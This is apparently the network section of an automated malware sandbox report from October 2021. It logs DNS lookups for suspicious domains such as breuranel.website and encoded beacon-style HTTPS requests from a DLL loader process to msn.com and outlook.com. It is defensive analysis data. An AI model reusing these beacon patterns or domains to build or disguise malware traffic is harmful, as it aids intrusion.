                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST53575258.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:15.993360043 CEST5381453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST53538148.8.8.8192.168.2.4

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Oct 12, 2021 00:38:03.208512068 CEST192.168.2.48.8.8.80x8ef2Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:05.070362091 CEST192.168.2.48.8.8.80xc63aStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:10.907257080 CEST192.168.2.48.8.8.80x9600Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:11.716469049 CEST192.168.2.48.8.8.80xf4cfStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:25.800733089 CEST192.168.2.48.8.8.80x9f0cStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:32.527570009 CEST192.168.2.48.8.8.80xe0e2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.880023956 CEST192.168.2.48.8.8.80x9608Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.614259958 CEST192.168.2.48.8.8.80x77eeStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.775543928 CEST192.168.2.48.8.8.80x8150Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.743369102 CEST192.168.2.48.8.8.80x6526Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.220117092 CEST192.168.2.48.8.8.80x211dStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.397085905 CEST192.168.2.48.8.8.80x4078Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:07.148479939 CEST192.168.2.48.8.8.80xca44Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:13.816450119 CEST192.168.2.48.8.8.80x8a5Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.242336988 CEST192.168.2.48.8.8.80x7dbStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.719876051 CEST192.168.2.48.8.8.80xf46fStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:33.981678963 CEST192.168.2.48.8.8.80xb117Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.465598106 CEST192.168.2.48.8.8.80x128dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:48.098314047 CEST192.168.2.48.8.8.80x2804Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:55.946903944 CEST192.168.2.48.8.8.80x8958Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.155658960 CEST192.168.2.48.8.8.80xf83Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.626851082 CEST192.168.2.48.8.8.80x901eStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.775460958 CEST192.168.2.48.8.8.80x1debStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:15.993360043 CEST192.168.2.48.8.8.80x8b0cStandard query (0)outlook.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Oct 12, 2021 00:38:03.228565931 CEST8.8.8.8192.168.2.40x8ef2No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:05.088568926 CEST8.8.8.8192.168.2.40xc63aNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:10.925432920 CEST8.8.8.8192.168.2.40x9600No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:11.734641075 CEST8.8.8.8192.168.2.40xf4cfNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:25.818322897 CEST8.8.8.8192.168.2.40x9f0cName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:32.546330929 CEST8.8.8.8192.168.2.40xe0e2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.183.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.98A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.178.98A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.223.66A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.218.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.151.130A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.219.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.98.171.242A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.151.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.97.137.210A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.98.199.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.98.223.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)HHN-efz.ms-acdc.office.com52.97.171.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:07.172518015 CEST8.8.8.8192.168.2.40xca44Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:13.840886116 CEST8.8.8.8192.168.2.40x8a5Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.260047913 CEST8.8.8.8192.168.2.40x7dbNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.740092039 CEST8.8.8.8192.168.2.40xf46fNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.002629995 CEST8.8.8.8192.168.2.40xb117No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.485994101 CEST8.8.8.8192.168.2.40x128dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:48.117002010 CEST8.8.8.8192.168.2.40x2804Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:55.966435909 CEST8.8.8.8192.168.2.40x8958Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST8.8.8.8192.168.2.40xf83No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.207.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.34A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST8.8.8.8192.168.2.40x901eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.124.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST8.8.8.8192.168.2.40x1debNo error (0)FRA-efz.ms-acdc.office.com40.101.9.178A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • msn.com
                                                                                                                        • outlook.com
                                                                                                                        • www.outlook.com
                                                                                                                        • outlook.office365.com

                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.44977613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:04 UTC0OUTGET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:04 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:04 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 373
                                                                                                                        2021-10-11 22:38:04 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 33 31 50 6c 61 5f 32 42 43 58 74 65 69 2f 31 52 5f 32 42 59 36 4f 2f 78 56 38 59 30 50 65 50 6f 45 78 73 4b 76 64 52 73 41 72 4c 6a 4d 54 2f 30 48 59 39 65 77 47 6c 34 64 2f 52 54 68 37 56 34 73 79 30 42 53 48 5f 32 42 74 6c 2f 39 73 71 4b 32 33 70 7a 57 31 78 59 2f 6b 50 54 36 6c 6d 76 47 59 4c 77 2f 43 66 32 49 4f 52 32 66 68 5a 54 79 4e 4c 2f
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.44977913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:11 UTC1OUTGET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:11 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:11 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
                                                                                                                        2021-10-11 22:38:11 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 4e 74 5a 67 67 71 78 49 58 32 45 46 39 77 5f 32 2f 42 61 76 54 51 30 6a 48 6b 38 7a 37 32 45 30 2f 6d 72 41 5f 32 42 4e 6f 35 66 47 66 31 38 71 53 35 33 2f 47 49 68 41 34 46 4e 70 63 2f 71 49 51 62 4a 56 6b 78 4c 48 70 49 78 33 4c 7a 4a 63 59 46 2f 33 75 51 7a 33 50 67 49 43 35 50 6a 6e 64 79 37 76 42 48 2f 69 5f 32 46 4f 61 6f 4b 36 70 55 7a 71
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzq


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.44986040.97.153.146443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:40:08 UTC14OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC14INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 448417ac-9aed-bf6f-b902-bf5f92a7f6fb
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        X-RequestId: 0a3dbc15-af9f-42a8-9d5e-2a0de062e8b5
                                                                                                                        MS-CV: rBeERO2ab7+5Ar9fkqf2+w.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.2.44986152.98.207.194443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
